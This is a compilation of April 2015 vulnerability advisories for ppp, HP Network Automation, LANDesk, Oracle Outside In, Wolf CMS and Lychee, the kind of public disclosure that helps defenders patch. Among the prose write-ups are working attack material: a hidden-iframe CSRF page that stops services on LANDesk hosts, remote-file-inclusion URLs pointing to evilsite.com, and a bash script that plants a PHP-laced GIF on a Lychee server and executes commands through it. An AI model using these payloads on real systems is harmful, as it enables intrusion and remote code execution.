[SECURITY] [DSA 3228-1] ppp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - Debian Security Advisory DSA-3228-1 secur...@debian.org http://www.debian.org/security/Sebastien Delafond April 16, 2015 http://www.debian.org/security/faq - - Package: ppp CVE ID : CVE-2015-3310 Debian Bug : 782450 Emanuele Rocca discovered that ppp, a daemon implementing the Point-to-Point Protocol, was subject to a buffer overflow when communicating with a RADIUS server. This would allow unauthenticated users to cause a denial-of-service by crashing the daemon. For the stable distribution (wheezy), this problem has been fixed in version 2.4.5-5.1+deb7u2. For the upcoming stable distribution (jessie) and unstable distribution (sid), this problem has been fixed in version 2.4.6-3.1. We recommend that you upgrade your ppp packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2 iQEcBAEBCAAGBQJVL2reAAoJEBC+iYPz1Z1knigH/3VwF1EmHuFPoxe3shWov7+9 8emJ34eqfLhO2rkZ/gXntad+1uhBcNVIAhMOL0vQXaih8vfNSxG7gydqNg8CVjKn k2CBWo8lPD/CBjpjn7XbxzcdJrayX+E+Pj87W8StsjlzRMawrCFN3ptKUhPn961V ZwdG9wQzdtunlWy7mHYdE9/inlV/mLaC2Q9/tC2Iew3/Su0gCpyEFjJ3lGs55B4d 4JzOwnzrXtrdFTOUME9FGog8KNAr16w1kQ1ii6++PoAJV1p/mMGwrRccQA5j6F4r OlyyPRuncASH4xwO3NzaDBcSHXzs+TaERxatYWW9kIeTr2eEel+NE8POCiCKy5w= =KXp8 -END PGP SIGNATURE-
[security bulletin] HPSBMU03264 rev.1 - HP Network Automation, Multiple Remote Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04574207 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04574207 Version: 1 HPSBMU03264 rev.1 - HP Network Automation, Multiple Remote Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-04-15 Last Updated: 2015-04-15 Potential Security Impact: Multiple remote vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Network Automation. These include Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), clickjacking and other vulnerabilities which can be used to create remote exploits. References: CVE-2014-7886 VU#750060 SSRT101865 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Automation v9.0X HP Network Automation v9.1X HP Network Automation v9.2X HP Network Automation v10.X BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-7886(AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following updates and information available to address these vulnerabilities in HP Network Automation. Note: Customers running Network Automation v9.0X and v9.1X should upgrade to v09.22.02 to resolve these issues. Network Automation Patch v09.22.02: NA_00027 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea rch/document/KM01512941 Network Automation Patch v10.00.01: NA_00028 https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea rch/document/KM01512943 See Knowledge Document for further configuration information: https://softwaresupport.hp.com/group/softwaresupport/search- result/-/facetsearch/document/KM01411842 HISTORY Version:1 (rev.1) - 15 April 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlUu3sQACgkQ4B86/C0qfVmrngCffhWHa2TLzf7x2XGUwK54dXnE 2tMAnR0B6tyjj14ZPHADJte6ytb4tGyI =sl7r -END PGP SIGNATURE-
[CVE-2014-5361][CVE-2014-5362]Landesk Management Suite RFI CSRF Security Vulnerabilities
Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities Product: Landesk Management Suite Vulnerable Versions: 9.5 (and possible previous versions), 9.6 Tested Version: 9.5 Advisory Publication: 16/04/2015 Latest Update: 16/04/2015 Vulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829] CVE Reference: CVE-2014-5361, CVE-2014-5362 Credit: Alex Haynes Advisory Details: (1) Vendor Product Description Vendor: LANDESK Product Version: Landesk Management Suite v9.5 Vendor URL Download: http://www.landesk.com/products/management-suite/ Product Description: Manage all your users multi-platform desktops and mobile devices. Integrate several IT disciplines into a single management experience that speeds software distribution, ensures software license compliance, simplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X. (2) Vulnerability Details: -- The admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request forgery (CSRF) attacks. Proof of concept for CSRF [CVE-2014-5361]: - URL: https://LANDESK/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT Attack Pattern: Certain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, among other things, manipulate windows services and processes on host machines. Example code below: !-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine -- html head script !-- For illustration only, Skype and Adobe Acrobat Update Services are shut down / Replace with any windows service on host machine -- window.onload = function() { document.getElementById(csrfForm1).submit(); document.getElementById(csrfForm2).submit(); } /script /head body form id=csrfForm1 action=https://landesk/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT; method=POST enctype=multipart/form-data target=csrfIframe1 input type=hidden name=op value=stop / input type=hidden name=name value=Adobe Acrobat Update Service / /form form id=csrfForm2 action=https://landesk/remote/serverServices.aspx?cidn=5d=serverServicestb=serverInfo_services.tbgid=groupSW_Servicesitemid=SW_ServicesUID=SW_Services_SW_ROOT; method=POST enctype=multipart/form-data target=csrfIframe2 input type=hidden name=op value=stop / input type=hidden name=name value=Skype Updater / /form iframe style=display:hidden height=0 width=0 frameborder=0 namecsrfIframe1/iframe iframe style=display:hidden height=0 width=0 frameborder=0 namecsrfIframe2/iframe /body /html Proof of concept for RFI [CVE-2014-5362]: - There are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use of relative paths. This can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through the landesk server. URLs: https://LANDESK/ldms/sm_actionfrm.asp?cmd=dirht=1d=//RFI here https://LANDESK/remote/frm_coremainfrm.aspx?tb=cust_qry.tbd=//RFI herebfn=swd_topnode=4baseType=group1groupID=1646groupType=nullownerID=56 https://LANDESK/remote/frm_splitfrm.aspx?top=//RFI herettb=dirman.tbftr=frm_tasktabsfrmtabf=dirman_tabstf=dirman_topbottom=frm_taskfrmbbd=SoftwareDistribution/ldaplistbf=dirlist_bottombd=frm_coremainfrmbtb=dirlist.tbpct=50 Parameter names: d top Parameter Type: GET Attack Pattern: The Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in HTTPS. d=//any external URL here/filenamehere(.aspx) example: https://LANDESK/ldms/sm_actionfrm.asp?cmd=dirht=1d=//evilsite.com/myevilaspxfile (3) Advisory Timeline: -- 15/09/2014 - First Contact 23/10/2014 - Request for update on fix. No ETA given. 21/11/2014 - Request for update on fix. No ETA given. 22/12/2014 - Request for update on fix. No ETA given. 22/01/2015 - Request for update on fix. No ETA given. 13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix. 16/04/2015 - Public disclosure (4)Solution: No fix at this time. (5) Credits: Discovered by Alex Haynes References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362
Secunia Research: Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability
== Secunia Research 16/04/2015 Oracle Outside In ibpsd2.dll PSD File Processing Buffer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.4.1, 8.5.0, and 8.5.1 == 2) Severity Rating: Moderately critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a sign extension error in ibpsd2.dll when processing PSD files, which can be exploited to cause a heap-based buffer overflow. Successful exploitation of the vulnerability may allow execution of arbitrary code. == 4) Solution Apply update. Please see the Oracle Critical Patch Update Advisory for April 2015 for details. == 5) Time Table 11/02/2015 - Vendor notified. 11/02/2015 - Vendor response. 12/02/2015 - Vendor supplied bug ticket ID. 24/02/2015 - Vendor supplied information of fix in main codeline. 13/03/2015 - Vendor requested delay of disclosure. 16/03/2015 - Replied to vendor and requested a new estimated date. 16/03/2015 - Vendor replied that estimated date will be investigated. 19/03/2015 - Vendor supplied 14/07/2015 as estimated fix date. 24/03/2015 - Vendor supplied status report. 10/04/2015 - Vendor supplied 14/04/2015 as estimated fix date. 14/04/2015 - Release of vendor patch. 15/04/2015 - Public disclosure. == 6) Credits Discovered by Dmitry Janushkevich, Secunia Research. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-0493 identifier for the vulnerability. == 8) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-2/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability
,--^--,,-,---^--, | | `' | O .. CWH Underground Hacking Team .. `+---^--| `\_,---, _| / XX /`| / / XX / `\ / / XX /\__( / XX / / XX / (( `--' Exploit Title : Wolf CMS Arbitrary File Upload Exploit Date: 16 April 2015 Exploit Author : CWH Underground Discovered By : ZeQ3uL Site: www.2600.in.th Vendor Homepage : https://www.wolfcms.org/ Software Link : https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.2.zip Version : 0.8.2 SOFTWARE DESCRIPTION Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS. ### VULNERABILITY: Arbitrary File Upload ### This exploit a file upload vulnerability found in Wolf CMS 0.8.2, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file into the application with authenticated user, which results in arbitrary remote code execution. The vulnerability was found on File Manager Function (Enabled by default), which provides interfaces to manage files from the administration. In this simple example, there are no restrictions made regarding the type of files allowed for uploading. Therefore, an attacker can upload a PHP shell file with malicious code that can lead to full control of a victim server. Additionally, the uploaded file can be moved to the root directory, meaning that the attacker can access it through the Internet. /wolf/plugins/file_manager/FileManagerController.php (LINE: 302-339) - // Clean filenames $filename = preg_replace('/ /', '_', $_FILES['upload_file']['name']); $filename = preg_replace('/[^a-z0-9_\-\.]/i', '', $filename); if (isset($_FILES)) { $file = $this-_upload_file($filename, FILES_DIR . '/' . $path . '/', $_FILES['upload_file']['tmp_name'], $overwrite); if ($file === false) Flash::set('error', __('File has not been uploaded!')); } - # Disclosure Timeline # [04/04/2015] Issue reported to Developer Team [08/04/2015] Discussed for fixing the issue # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Lychee 2.7.1 remote code execution
Advisory ID: SGMA15-002 Title: Lychee remote code execution Product: Lychee Version: 2.7.1 and probably prior Vendor: lychee.electerious.com Vulnerability type: Remote Code Execution Risk level: High Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-04-12 Vendor fix: 2015-04-13 Public disclosure: 2015-04-15 Details Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability. The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension validation. Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution can be achieved. Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a specially crafted image file containing PHP code. To exploit this vulnerability the attacker must be logged as administrator. The following proof of concept demostrates the issue #!/bin/bash LYCHEE_HOST=lychee.local PHPSESSID=e0ac560kmqf0lli9u5jd20qt46 LOCALIP=172.16.85.1 CMD=uname -a cd /tmp || exit 1 echo Creating gif... GIF=\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A?php system('$CMD')? echo -e $GIF gif.php echo Starting local webserver python -m SimpleHTTPServer /dev/null 21 sleep 1 echo Starting the import procedure curl http://$LYCHEE_HOST/php/api.php; -H Cookie: PHPSESSID=$PHPSESSID --data function=importUrlurl=http%3A//$LOCALIP:8000/gif.phpalbumID=0 sleep 5 kill %1 rm gif.php echo Executing command.. curl http://$LYCHEE_HOST/data/gif.php; #EOF Solution Upgrade to Lychee version 2.7.2 References http://lychee.electerious.com Filippo Cavallarin https://segment.technology/